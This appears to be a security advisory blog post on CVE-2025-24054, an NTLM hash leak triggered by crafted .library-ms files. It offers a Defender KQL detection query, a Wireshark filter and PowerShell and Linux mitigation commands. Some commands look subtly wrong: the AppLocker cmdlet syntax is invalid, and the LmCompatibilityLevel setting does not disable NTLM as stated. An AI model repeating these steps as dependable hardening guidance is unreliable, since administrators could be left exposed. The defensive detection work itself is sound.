Listen to this Post
A newly discovered vulnerability, CVE-2025-24054, is actively being exploited, allowing attackers to leak NTLM hashes or user passwords via a maliciously crafted `.library-ms` file. Despite Microsoft releasing a patch on March 11, 2025, threat actors had already begun leveraging the exploit by March 19, 2025 according to Check Point Research.
🔗 Reference: CVE-2025-24054, NTLM Exploit in the Wild – Check Point Research
You Should Know:
Detection with Defender XDR KQL Query
The following Kusto Query Language (KQL) can help detect potential exploitation attempts via `.library-ms` files:
DeviceFileEvents | where ActionType == "FileCreated" and FileName endswith ".library-ms" | where parse_json(AdditionalFields)["FileType"] has "library-ms" | where InitiatingProcessUniqueId != 0 | join DeviceNetworkEvents on InitiatingProcessUniqueId | where RemotePort == "445" and Protocol == "Tcp"
Mitigation Steps
1. Apply Microsoft’s March 2025 Patch
- Ensure all Windows systems are updated with the latest security patches.
- Check updates via PowerShell:
Get-WindowsUpdate -Install -AcceptAll -AutoReboot
2. Disable NTLM if Possible
- Use Group Policy to enforce Kerberos instead:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5
3. Monitor SMB (Port 445) Traffic
- Use Wireshark or Microsoft Defender for Endpoint to detect suspicious SMB requests.
- Example Wireshark filter:
tcp.port == 445 && smb2
4. Block Malicious `.library-ms` Files
- Deploy AppLocker or Software Restriction Policies (SRP) to prevent execution:
New-AppLockerPolicy -RuleType Path -FileInformation ".library-ms" -Deny -User Everyone
5. Enable SMB Signing
- Prevent NTLM relay attacks by enforcing SMB signing:
Set-SmbClientConfiguration -RequireSecuritySignature $true Set-SmbServerConfiguration -RequireSecuritySignature $true
Additional Linux Security Checks
If managing hybrid environments, ensure Linux systems interacting with Windows are secured:
– Check Samba configurations (/etc/samba/smb.conf):
testparm -s
– Audit NTLM authentication attempts on Linux:
journalctl -u smbd --grep "NTLM"
What Undercode Say
This exploit highlights the risks of legacy authentication protocols like NTLM. Organizations must:
✔ Patch immediately – Delays increase exposure.
✔ Enforce modern auth – Kerberos or certificate-based auth should replace NTLM.
✔ Monitor file creation – Unusual `.library-ms` files indicate compromise.
✔ Segment networks – Limit SMB (port 445) traffic to trusted zones.
Expected Output:
- Detection alerts for `.library-ms` file creation.
- Blocked NTLM relay attempts via SMB signing.
- Reduced attack surface through NTLM deprecation.
🔗 Further Reading:
References:
Reported By: 0x534c Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
